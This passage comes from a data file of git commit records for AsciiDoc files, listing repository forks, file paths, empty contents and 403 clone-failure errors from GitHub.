/elasticsearch,kaneshin\/elasticsearch,jpountz\/elasticsearch,jango2015\/elasticsearch,rento19962\/elasticsearch,iamjakob\/elasticsearch,glefloch\/elasticsearch,apepper\/elasticsearch,mjhennig\/elasticsearch,awislowski\/elasticsearch,likaiwalkman\/elasticsearch,trangvh\/elasticsearch,nrkkalyan\/elasticsearch,karthikjaps\/elasticsearch,Uiho\/elasticsearch,qwerty4030\/elasticsearch,kimimj\/elasticsearch,acchen97\/elasticsearch,karthikjaps\/elasticsearch,kunallimaye\/elasticsearch,kalburgimanjunath\/elasticsearch,strapdata\/elassandra,markwalkom\/elasticsearch,lzo\/elasticsearch-1,tebriel\/elasticsearch,petabytedata\/elasticsearch,jeteve\/elasticsearch,yuy168\/elasticsearch,Liziyao\/elasticsearch,liweinan0423\/elasticsearch,spiegela\/elasticsearch,liweinan0423\/elasticsearch,xingguang2013\/elasticsearch,sneivandt\/elasticsearch,ulkas\/elasticsearch,ivansun1010\/elasticsearch,ThalaivaStars\/OrgRepo1,JSCooke\/elasticsearch,kingaj\/elasticsearch,wayeast\/elasticsearch,linglaiyao1314\/elasticsearch,jango2015\/elasticsearch,ckclark\/elasticsearch,springning\/elasticsearch,StefanGor\/elasticsearch,PhaedrusTheGreek\/elasticsearch,iamjakob\/elasticsearch,lydonchandra\/elasticsearch,s1monw\/elasticsearch,kunallimaye\/elasticsearch,Uiho\/elasticsearch,amit-shar\/elasticsearch,szroland\/elasticsearch,hirdesh2008\/elasticsearch,jprante\/elasticsearch,lydonchandra\/elasticsearch,brandonkearby\/elasticsearch,kubum\/elasticsearch,btiernay\/elasticsearch,achow\/elasticsearch,camilojd\/elasticsearch,rmuir\/elasticsearch,ivansun1010\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,fooljohnny\/elasticsearch,ThalaivaStars\/OrgRepo1,lchennup\/elasticsearch,queirozfcom\/elasticsearch,Shepard1212\/elasticsearch,wenpos\/elasticsearch,EasonYi\/elasticsearch,javachengwc\/elasticsearch,iamjakob\/elasticsearch,markllama\/elasticsearch,jango2015\/elasticsearch,Brijeshrpatel9\/elasticsearch,glefloch\/elasticsearch,Fsero\/elasticsearch,iantruslove\/elasticsearch,MetSystem\/elasticsearch,infusionsoft\/elasticsearch,lzo\/elasticsearch-1,jprante\/elasticsearch,hafkensite\/elasticsearch,fooljohnny\/elasticsearch,schonfeld\/elasticsearch,fernandozhu\/elasticsearch,sreeramjayan\/elasticsearch,wittyameta\/elasticsearch,Uiho\/elasticsearch,sarwarbhuiyan\/elasticsearch,sc0ttkclark\/elasticsearch,maddin2016\/elasticsearch,HarishAtGitHub\/elasticsearch,bestwpw\/elasticsearch,areek\/elasticsearch,18098924759
\/elasticsearch,18098924759\/elasticsearch,KimTaehee\/elasticsearch,cnfire\/elasticsearch-1,karthikjaps\/elasticsearch,JSCooke\/elasticsearch,wimvds\/elasticsearch,luiseduardohdbackup\/elasticsearch,MetSystem\/elasticsearch,SergVro\/elasticsearch,njlawton\/elasticsearch,maddin2016\/elasticsearch,humandb\/elasticsearch,phani546\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,njlawton\/elasticsearch,iamjakob\/elasticsearch,martinstuga\/elasticsearch,TonyChai24\/ESSource,myelin\/elasticsearch,nazarewk\/elasticsearch,wuranbo\/elasticsearch,yongminxia\/elasticsearch,sreeramjayan\/elasticsearch,onegambler\/elasticsearch,kevinkluge\/elasticsearch,andrestc\/elasticsearch,linglaiyao1314\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,ZTE-PaaS\/elasticsearch,acchen97\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,sarwarbhuiyan\/elasticsearch,rhoml\/elasticsearch,StefanGor\/elasticsearch,amit-shar\/elasticsearch,fernandozhu\/elasticsearch,kubum\/elasticsearch,i-am-Nathan\/elasticsearch,cnfire\/elasticsearch-1,kalburgimanjunath\/elasticsearch,jeteve\/elasticsearch,C-Bish\/elasticsearch,sc0ttkclark\/elasticsearch,Liziyao\/elasticsearch,Kakakakakku\/elasticsearch,abibell\/elasticsearch,gingerwizard\/elasticsearch,thecocce\/elasticsearch,mortonsykes\/elasticsearch,mikemccand\/elasticsearch,szroland\/elasticsearch,a2lin\/elasticsearch,ricardocerq\/elasticsearch,rmuir\/elasticsearch,MichaelLiZhou\/elasticsearch,shreejay\/elasticsearch,dongjoon-hyun\/elasticsearch,henakamaMSFT\/elasticsearch,Helen-Zhao\/elasticsearch,bawse\/elasticsearch,tebriel\/elasticsearch,overcome\/elasticsearch,tahaemin\/elasticsearch,drewr\/elasticsearch,achow\/elasticsearch,humandb\/elasticsearch,ydsakyclguozi\/elasticsearch,rento19962\/elasticsearch,knight1128\/elasticsearch,jango2015\/elasticsearch,acchen97\/elasticsearch,knight1128\/elasticsearch,mortonsykes\/elasticsearch,njlawton\/elasticsearch,rento19962\/elasticsearch,pranavraman\/elasticsearch,uschindler\/elasticsearch,Widen\/elasticsearch,andrejserafim\/elasticsearch,ImpressTV\/elasticsearch,markharwood\/elasticsearch,s1monw\/elasticsearch,i-am-Nathan\/elasticsearch,cwurm\/elasticsearch,franklanganke\/elasticsearch,lightslife\/elasticsearch,kimimj\/elasticsearch,YosuaMichael\/elasticsearch,s1monw\/elasticsearch,davidvgalbraith\/elasticsearch,hanswang\/elasticsearch,mapr\/elasticsearch,kubum\/elasticsearch,girirajsharma\/elasticsearch,tsohil\/elasticsearch,tsohil\/elasticsearch,kimimj\/elasticsearch,zeroctu\/elasticsearch,markllama\/elasticsearch,pablocastro\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,masterweb121\/elasticsearch,hirdesh2008\/elasticsearch,truemped\/elasticsearch,mm0\/elasticsearch,mcku\/elasticsearch,kcompher\/elasticsearch,socialrank\/elasticsearch,LeoYao\/elasticsearch,kenshin233\/elasticsearch,TonyChai24\/ESSource,sposam\/elasticsearch,markharwood\/elasticsearch,rhoml\/elasticsearch,slavau\/elasticsearch,rajanm\/elasticsearch,TonyChai24\/ESSource,thecocce\/elasticsearch,socialrank\/elasticsearch,KimTaehee\/elasticsearch,fekaputra\/elasticsearch,jchampion\/elasticsearch,springning\/elasticsearch,tsohil\/elasticsearch,phani546\/elasticsearch,mnylen\/elasticsearch,gfyoung\/elasticsearch,tebriel\/elasticsearch,nellicus\/elasticsearch,ckclark\/elasticsearch,koxa29\/elasticsearch,AndreKR\/elasticsearch,wangtuo\/elasticsearch,chirilo\/elasticsearch,ricardocerq\/elasticsearch,tahaemin\/elasticsearch,scottsom\/elasticsearch,vroyer\/elasticassandra,Collaborne\/elasticsearch,koxa29\/elasticsearch,markwalkom\/elasticsearch,jimczi\/elasticsearc
h,gmarz\/elasticsearch,nknize\/elasticsearch,achow\/elasticsearch,zkidkid\/elasticsearch,ivansun1010\/elasticsearch,koxa29\/elasticsearch,AshishThakur\/elasticsearch,MjAbuz\/elasticsearch,Liziyao\/elasticsearch,wimvds\/elasticsearch,NBSW\/elasticsearch,kevinkluge\/elasticsearch,MisterAndersen\/elasticsearch,Siddartha07\/elasticsearch,uschindler\/elasticsearch,franklanganke\/elasticsearch,wayeast\/elasticsearch,xingguang2013\/elasticsearch,MjAbuz\/elasticsearch,humandb\/elasticsearch,xuzha\/elasticsearch,truemped\/elasticsearch,winstonewert\/elasticsearch,ydsakyclguozi\/elasticsearch,hydro2k\/elasticsearch,kevinkluge\/elasticsearch,mcku\/elasticsearch,diendt\/elasticsearch,trangvh\/elasticsearch,yynil\/elasticsearch,Shekharrajak\/elasticsearch,zhiqinghuang\/elasticsearch,yuy168\/elasticsearch,Rygbee\/elasticsearch,Rygbee\/elasticsearch,dylan8902\/elasticsearch,dataduke\/elasticsearch,gfyoung\/elasticsearch,lmtwga\/elasticsearch,djschny\/elasticsearch,Widen\/elasticsearch,jimhooker2002\/elasticsearch,markllama\/elasticsearch,rento19962\/elasticsearch,skearns64\/elasticsearch,ouyangkongtong\/elasticsearch,alexbrasetvik\/elasticsearch,sauravmondallive\/elasticsearch,springning\/elasticsearch,jprante\/elasticsearch,queirozfcom\/elasticsearch,knight1128\/elasticsearch,btiernay\/elasticsearch,AshishThakur\/elasticsearch,nellicus\/elasticsearch,markharwood\/elasticsearch,thecocce\/elasticsearch,awislowski\/elasticsearch,Shepard1212\/elasticsearch,jango2015\/elasticsearch,markwalkom\/elasticsearch,mm0\/elasticsearch,gingerwizard\/elasticsearch,mmaracic\/elasticsearch,HonzaKral\/elasticsearch,JackyMai\/elasticsearch,ulkas\/elasticsearch,bestwpw\/elasticsearch,mgalushka\/elasticsearch,kalimatas\/elasticsearch,artnowo\/elasticsearch,Kakakakakku\/elasticsearch,wenpos\/elasticsearch,Ansh90\/elasticsearch,masaruh\/elasticsearch,nrkkalyan\/elasticsearch,scorpionvicky\/elasticsearch,ckclark\/elasticsearch,iacdingping\/elasticsearch,kingaj\/elasticsearch,jango2015\/elasticsearch,Charlesdong\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,shreejay\/elasticsearch,pozhidaevak\/elasticsearch,likaiwalkman\/elasticsearch,YosuaMichael\/elasticsearch,Shepard1212\/elasticsearch,dpursehouse\/elasticsearch,beiske\/elasticsearch,nezirus\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,strapdata\/elassandra5-rc,dpursehouse\/elasticsearch,wayeast\/elasticsearch,zeroctu\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,lydonchandra\/elasticsearch,wbowling\/elasticsearch,sneivandt\/elasticsearch,markllama\/elasticsearch,karthikjaps\/elasticsearch,huanzhong\/elasticsearch,elancom\/elasticsearch,huanzhong\/elasticsearch,martinstuga\/elasticsearch,liweinan0423\/elasticsearch,xpandan\/elasticsearch,tkssharma\/elasticsearch,ydsakyclguozi\/elasticsearch,djschny\/elasticsearch,strapdata\/elassandra5-rc,wenpos\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,Fsero\/elasticsearch,spiegela\/elasticsearch,TonyChai24\/ESSource,pranavraman\/elasticsearch,mmaracic\/elasticsearch,scottsom\/elasticsearch,nknize\/elasticsearch,skearns64\/elasticsearch,MisterAndersen\/elasticsearch,adrianbk\/elasticsearch,geidies\/elasticsearch,areek\/elasticsearch,snikch\/elasticsearch,a2lin\/elasticsearch,lchennup\/elasticsearch,gmarz\/elasticsearch,bestwpw\/elasticsearch,pritishppai\/elasticsearch,wenpos\/elasticsearch,ivansun1010\/elasticsearch,yanjunh\/elasticsearch,iantruslove\/elasticsearch,camilojd\/elasticsearch,davidvgalbraith\/elasticsearch,jimhooker2002\/elasticsearch,a2lin\/elasticsearch,drewr\/elasticsearch,beiske\/elasticsearch
,kenshin233\/elasticsearch,vroyer\/elasticassandra,AshishThakur\/elasticsearch,AndreKR\/elasticsearch,YosuaMichael\/elasticsearch,beiske\/elasticsearch,infusionsoft\/elasticsearch,mgalushka\/elasticsearch,episerver\/elasticsearch,i-am-Nathan\/elasticsearch,mute\/elasticsearch,EasonYi\/elasticsearch,mjhennig\/elasticsearch,petabytedata\/elasticsearch,onegambler\/elasticsearch,spiegela\/elasticsearch,hafkensite\/elasticsearch,javachengwc\/elasticsearch,markwalkom\/elasticsearch,phani546\/elasticsearch,areek\/elasticsearch,lks21c\/elasticsearch,truemped\/elasticsearch,mjason3\/elasticsearch,caengcjd\/elasticsearch,jbertouch\/elasticsearch,Liziyao\/elasticsearch,sarwarbhuiyan\/elasticsearch,kaneshin\/elasticsearch,F0lha\/elasticsearch,PhaedrusTheGreek\/elasticsearch,trangvh\/elasticsearch,girirajsharma\/elasticsearch,xpandan\/elasticsearch,lzo\/elasticsearch-1,MaineC\/elasticsearch,palecur\/elasticsearch,HonzaKral\/elasticsearch,yanjunh\/elasticsearch,Siddartha07\/elasticsearch,sdauletau\/elasticsearch,huanzhong\/elasticsearch,naveenhooda2000\/elasticsearch,tahaemin\/elasticsearch,gmarz\/elasticsearch,wbowling\/elasticsearch,yuy168\/elasticsearch,amit-shar\/elasticsearch,YosuaMichael\/elasticsearch,milodky\/elasticsearch,winstonewert\/elasticsearch,strapdata\/elassandra-test,kcompher\/elasticsearch,jbertouch\/elasticsearch,rlugojr\/elasticsearch,uschindler\/elasticsearch,phani546\/elasticsearch,iacdingping\/elasticsearch,strapdata\/elassandra-test,kaneshin\/elasticsearch,kaneshin\/elasticsearch,diendt\/elasticsearch,jeteve\/elasticsearch,achow\/elasticsearch,jango2015\/elasticsearch,infusionsoft\/elasticsearch,zhiqinghuang\/elasticsearch,onegambler\/elasticsearch,infusionsoft\/elasticsearch,fekaputra\/elasticsearch,Collaborne\/elasticsearch,adrianbk\/elasticsearch,MichaelLiZhou\/elasticsearch,C-Bish\/elasticsearch,iamjakob\/elasticsearch,snikch\/elasticsearch,tsohil\/elasticsearch,huypx1292\/elasticsearch,vietlq\/elasticsearch,wittyameta\/elasticsearch,schonfeld\/elasticsearch,xpandan\/elasticsearch,kunallimaye\/elasticsearch,weipinghe\/elasticsearch,khiraiwa\/elasticsearch,humandb\/elasticsearch,queirozfcom\/elasticsearch,andrejserafim\/elasticsearch,ulkas\/elasticsearch,jimczi\/elasticsearch,jbertouch\/elasticsearch,ouyangkongtong\/elasticsearch,mohit\/elasticsearch,sdauletau\/elasticsearch,18098924759\/elasticsearch,vingupta3\/elasticsearch,drewr\/elasticsearch,mjhennig\/elasticsearch,markwalkom\/elasticsearch,fred84\/elasticsearch,sc0ttkclark\/elasticsearch,mikemccand\/elasticsearch,shreejay\/elasticsearch,sauravmondallive\/elasticsearch,kalimatas\/elasticsearch,hanswang\/elasticsearch,Charlesdong\/elasticsearch,markharwood\/elasticsearch,AndreKR\/elasticsearch,apepper\/elasticsearch,martinstuga\/elasticsearch,diendt\/elasticsearch,andrestc\/elasticsearch,achow\/elasticsearch,aglne\/elasticsearch,jimhooker2002\/elasticsearch,mm0\/elasticsearch,jsgao0\/elasticsearch,nknize\/elasticsearch,KimTaehee\/elasticsearch,brandonkearby\/elasticsearch,tahaemin\/elasticsearch,mmaracic\/elasticsearch,nellicus\/elasticsearch,lightslife\/elasticsearch,lzo\/elasticsearch-1,IanvsPoplicola\/elasticsearch,jprante\/elasticsearch,Chhunlong\/elasticsearch,Stacey-Gammon\/elasticsearch,kcompher\/elasticsearch,martinstuga\/elasticsearch,lydonchandra\/elasticsearch,Shekharrajak\/elasticsearch,masterweb121\/elasticsearch,NBSW\/elasticsearch,Rygbee\/elasticsearch,zhiqinghuang\/elasticsearch,xuzha\/elasticsearch,umeshdangat\/elasticsearch,aglne\/elasticsearch,ZTE-PaaS\/elasticsearch,xuzha\/elasticsearch,qwerty4030\/elas
ticsearch,jsgao0\/elasticsearch,ThalaivaStars\/OrgRepo1,snikch\/elasticsearch,MichaelLiZhou\/elasticsearch,ESamir\/elasticsearch,palecur\/elasticsearch,nazarewk\/elasticsearch,Chhunlong\/elasticsearch,mnylen\/elasticsearch,mmaracic\/elasticsearch,hanswang\/elasticsearch,ThalaivaStars\/OrgRepo1,nilabhsagar\/elasticsearch,fforbeck\/elasticsearch,artnowo\/elasticsearch,loconsolutions\/elasticsearch,jchampion\/elasticsearch,mcku\/elasticsearch,MaineC\/elasticsearch,fernandozhu\/elasticsearch,sauravmondallive\/elasticsearch,Stacey-Gammon\/elasticsearch,ckclark\/elasticsearch,adrianbk\/elasticsearch,mortonsykes\/elasticsearch,JervyShi\/elasticsearch,zeroctu\/elasticsearch,GlenRSmith\/elasticsearch,ivansun1010\/elasticsearch,socialrank\/elasticsearch,petabytedata\/elasticsearch,amaliujia\/elasticsearch,mute\/elasticsearch,Chhunlong\/elasticsearch,Widen\/elasticsearch,mapr\/elasticsearch,scottsom\/elasticsearch,Brijeshrpatel9\/elasticsearch,socialrank\/elasticsearch,queirozfcom\/elasticsearch,mbrukman\/elasticsearch,infusionsoft\/elasticsearch,Uiho\/elasticsearch,Siddartha07\/elasticsearch,xingguang2013\/elasticsearch,kingaj\/elasticsearch,mrorii\/elasticsearch,HarishAtGitHub\/elasticsearch,nellicus\/elasticsearch,hafkensite\/elasticsearch,elancom\/elasticsearch,nrkkalyan\/elasticsearch,lightslife\/elasticsearch,alexbrasetvik\/elasticsearch,jchampion\/elasticsearch,lzo\/elasticsearch-1,jbertouch\/elasticsearch,fred84\/elasticsearch","old_file":"docs\/reference\/aggregations\/pipeline.asciidoc","new_file":"docs\/reference\/aggregations\/pipeline.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a93a0fe01e608d5df4b723cb7671c60de5221622","subject":"More samples HTML","message":"More samples HTML\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"HTML to DOM.adoc","new_file":"HTML to DOM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fceeca4d4cf88a9a06908330d23a695186f1c0f0","subject":"Update 2017-11-12-.adoc","message":"Update 2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"797f6ed987b90bb24d8665a60e9e81d6d348c78f","subject":"Added readme with reproduction steps for HHH-9788.","message":"Added readme with reproduction steps for HHH-9788.","repos":"olivergierke\/scratchpad","old_file":"HHH-9788\/README.adoc","new_file":"HHH-9788\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/olivergierke\/scratchpad.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ca75a73934d71c736122181eec98b9cd95d96d1c","subject":"skeleton arc42 documentation","message":"skeleton arc42 
documentation\n","repos":"aim42\/htmlSanityCheck,aim42\/htmlSanityCheck,aim42\/htmlSanityCheck","old_file":"docs\/hsc_arc42.adoc","new_file":"docs\/hsc_arc42.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aim42\/htmlSanityCheck.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f985e1b1b57a684956588a19c3628d304856ece2","subject":"Update 2016-11-09-Segundo-intento.adoc","message":"Update 2016-11-09-Segundo-intento.adoc","repos":"Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io","old_file":"_posts\/2016-11-09-Segundo-intento.adoc","new_file":"_posts\/2016-11-09-Segundo-intento.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Port666\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1eef3ad8d49d91be9c3f14aa8210fbe1ab3bcc8","subject":"Update 2015-12-13-Linux-Process-Monitor.adoc","message":"Update 2015-12-13-Linux-Process-Monitor.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"_posts\/2015-12-13-Linux-Process-Monitor.adoc","new_file":"_posts\/2015-12-13-Linux-Process-Monitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45503949f0b0a266fb90d9827e73c6870cfa5f75","subject":"Update 2017-09-11-In-Wort-und-Tat.adoc","message":"Update 2017-09-11-In-Wort-und-Tat.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-09-11-In-Wort-und-Tat.adoc","new_file":"_posts\/2017-09-11-In-Wort-und-Tat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4efd0cefcd35a2095ddbaf44283793b689064d2","subject":"Update 2019-01-31-My-sdadad-Title.adoc","message":"Update 2019-01-31-My-sdadad-Title.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2019-01-31-My-sdadad-Title.adoc","new_file":"_posts\/2019-01-31-My-sdadad-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca527fc08aa878fd97c8cceed9edd934c2647aee","subject":"Update 2015-07-08-123.adoc","message":"Update 2015-07-08-123.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-07-08-123.adoc","new_file":"_posts\/2015-07-08-123.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2mosquitoes\/2mosquitoes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e0973d6ada75abd2f6b2a6689bad35e6412cf9a","subject":"Update 
2016-02-02-zxx.adoc","message":"Update 2016-02-02-zxx.adoc","repos":"drankush\/drankush.github.io,drankush\/drankush.github.io,drankush\/drankush.github.io","old_file":"_posts\/2016-02-02-zxx.adoc","new_file":"_posts\/2016-02-02-zxx.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/drankush\/drankush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba7d12c697242b5b688db9b36f33204254b6fd92","subject":"Clarify application.properties example","message":"Clarify application.properties example\n\nThe syntax was a bit tortured. This should clarify things and also\nde-emphasise the \"production\" use case for the file system\nproperties file (we want to be cloud native don't we?).\n","repos":"joansmith\/spring-boot,thomasdarimont\/spring-boot,cleverjava\/jenkins2-course-spring-boot,olivergierke\/spring-boot,neo4j-contrib\/spring-boot,neo4j-contrib\/spring-boot,royclarkson\/spring-boot,minmay\/spring-boot,mosoft521\/spring-boot,herau\/spring-boot,scottfrederick\/spring-boot,chrylis\/spring-boot,tiarebalbi\/spring-boot,hello2009chen\/spring-boot,hello2009chen\/spring-boot,DeezCashews\/spring-boot,vpavic\/spring-boot,joansmith\/spring-boot,bjornlindstrom\/spring-boot,ollie314\/spring-boot,akmaharshi\/jenkins,royclarkson\/spring-boot,ihoneymon\/spring-boot,kdvolder\/spring-boot,ilayaperumalg\/spring-boot,minmay\/spring-boot,royclarkson\/spring-boot,jmnarloch\/spring-boot,sbcoba\/spring-boot,bbrouwer\/spring-boot,bijukunjummen\/spring-boot,philwebb\/spring-boot,xiaoleiPENG\/my-project,ameraljovic\/spring-boot,shangyi0102\/spring-boot,linead\/spring-boot,SaravananParthasarathy\/SPSDemo,zhangshuangquan\/spring-root,eddumelendez\/spring-boot,isopov\/spring-boot,felipeg48\/spring-boot,ameraljovic\/spring-boot,hqrt\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,mdeinum\/spring-boot,htynkn\/spring-boot,thomasdarimont\/spring-boot,nebhale\/spring-boot,kamilszymanski\/spring-boot,dfa1\/spring-boot,candrews\/spring-boot,hello2009chen\/spring-boot,Nowheresly\/spring-boot,mrumpf\/spring-boot,jxblum\/spring-boot,sbuettner\/spring-boot,philwebb\/spring-boot,philwebb\/spring-boot-concourse,shakuzen\/spring-boot,rweisleder\/spring-boot,jvz\/spring-boot,afroje-reshma\/spring-boot-sample,cleverjava\/jenkins2-course-spring-boot,philwebb\/spring-boot,Nowheresly\/spring-boot,zhangshuangquan\/spring-root,michael-simons\/spring-boot,izeye\/spring-boot,wilkinsona\/spring-boot,mbenson\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,yhj630520\/spring-boot,NetoDevel\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,habuma\/spring-boot,bclozel\/spring-boot,mbenson\/spring-boot,tiarebalbi\/spring-boot,ameraljovic\/spring-boot,akmaharshi\/jenkins,mbogoevici\/spring-boot,mrumpf\/spring-boot,eddumelendez\/spring-boot,philwebb\/spring-boot,mdeinum\/spring-boot,akmaharshi\/jenkins,michael-simons\/spring-boot,deki\/spring-boot,joshthornhill\/spring-boot,kdvolder\/spring-boot,donhuvy\/spring-boot,lenicliu\/spring-boot,vakninr\/spring-boot,ollie314\/spring-boot,pvorb\/spring-boot,lburgazzoli\/spring-boot,bclozel\/spring-boot,habuma\/spring-boot,wilkinsona\/spring-boot,sbuettner\/spring-boot,shangyi0102\/spring-boot,shakuzen\/spring-boot,mbogoevici\/spring-boot,bclozel\/spring-boot,scottfrederick\/spring-boot,lexandro\/spring-boot,dreis2211\/spring-boot,afroje-reshma\/spring-boot-sample,herau\/spring-boot,jxblum\/spring-boot,ameraljovic\/spring-boot,ptahchiev\/spring-boot,chrylis\/spring-boot,l
burgazzoli\/spring-boot,brettwooldridge\/spring-boot,izeye\/spring-boot,philwebb\/spring-boot-concourse,zhanhb\/spring-boot,bjornlindstrom\/spring-boot,chrylis\/spring-boot,drumonii\/spring-boot,joshiste\/spring-boot,spring-projects\/spring-boot,mosoft521\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,rweisleder\/spring-boot,mrumpf\/spring-boot,jxblum\/spring-boot,royclarkson\/spring-boot,felipeg48\/spring-boot,michael-simons\/spring-boot,tsachev\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jmnarloch\/spring-boot,neo4j-contrib\/spring-boot,jayarampradhan\/spring-boot,vpavic\/spring-boot,ilayaperumalg\/spring-boot,joansmith\/spring-boot,sbcoba\/spring-boot,jbovet\/spring-boot,ptahchiev\/spring-boot,izeye\/spring-boot,htynkn\/spring-boot,olivergierke\/spring-boot,afroje-reshma\/spring-boot-sample,zhangshuangquan\/spring-root,isopov\/spring-boot,Nowheresly\/spring-boot,hqrt\/jenkins2-course-spring-boot,pvorb\/spring-boot,isopov\/spring-boot,ilayaperumalg\/spring-boot,candrews\/spring-boot,bbrouwer\/spring-boot,ameraljovic\/spring-boot,dreis2211\/spring-boot,RichardCSantana\/spring-boot,mbenson\/spring-boot,jvz\/spring-boot,drumonii\/spring-boot,sbcoba\/spring-boot,sebastiankirsch\/spring-boot,mbogoevici\/spring-boot,bbrouwer\/spring-boot,dfa1\/spring-boot,qerub\/spring-boot,joshthornhill\/spring-boot,philwebb\/spring-boot,javyzheng\/spring-boot,hqrt\/jenkins2-course-spring-boot,mosoft521\/spring-boot,olivergierke\/spring-boot,joshiste\/spring-boot,scottfrederick\/spring-boot,aahlenst\/spring-boot,donhuvy\/spring-boot,ihoneymon\/spring-boot,jmnarloch\/spring-boot,linead\/spring-boot,brettwooldridge\/spring-boot,bclozel\/spring-boot,donhuvy\/spring-boot,deki\/spring-boot,sebastiankirsch\/spring-boot,NetoDevel\/spring-boot,pvorb\/spring-boot,jbovet\/spring-boot,jxblum\/spring-boot,kamilszymanski\/spring-boot,mbogoevici\/spring-boot,Buzzardo\/spring-boot,Buzzardo\/spring-boot,bijukunjummen\/spring-boot,minmay\/spring-boot,eddumelendez\/spring-boot,joshiste\/spring-boot,shakuzen\/spring-boot,jxblum\/spring-boot,jbovet\/spring-boot,kdvolder\/spring-boot,shakuzen\/spring-boot,deki\/spring-boot,bjornlindstrom\/spring-boot,izeye\/spring-boot,akmaharshi\/jenkins,chrylis\/spring-boot,wilkinsona\/spring-boot,vpavic\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ihoneymon\/spring-boot,vakninr\/spring-boot,shangyi0102\/spring-boot,SaravananParthasarathy\/SPSDemo,DeezCashews\/spring-boot,kdvolder\/spring-boot,vpavic\/spring-boot,sbcoba\/spring-boot,wilkinsona\/spring-boot,bijukunjummen\/spring-boot,bclozel\/spring-boot,lburgazzoli\/spring-boot,felipeg48\/spring-boot,thomasdarimont\/spring-boot,tsachev\/spring-boot,shangyi0102\/spring-boot,habuma\/spring-boot,cleverjava\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,htynkn\/spring-boot,michael-simons\/spring-boot,RichardCSantana\/spring-boot,jvz\/spring-boot,thomasdarimont\/spring-boot,hqrt\/jenkins2-course-spring-boot,spring-projects\/spring-boot,chrylis\/spring-boot,kamilszymanski\/spring-boot,SaravananParthasarathy\/SPSDemo,yhj630520\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,candrews\/spring-boot,zhanhb\/spring-boot,ptahchiev\/spring-boot,zhanhb\/spring-boot,olivergierke\/spring-boot,sebastiankirsch\/spring-boot,afroje-reshma\/spring-boot-sample,htynkn\/spring-boot,yhj630520\/spring-boot,donhuvy\/spring-boot,jayarampradhan\/spring-boot,minmay\/spring-boot,zhangshuangquan\/spring-root,cleverjava\/jenkins2-course-spring-boot,akmaharshi\/jenkins,jxblum\/spring-boot,mdeinum\/spring-boot,michael-simons\/spring-boot,tia
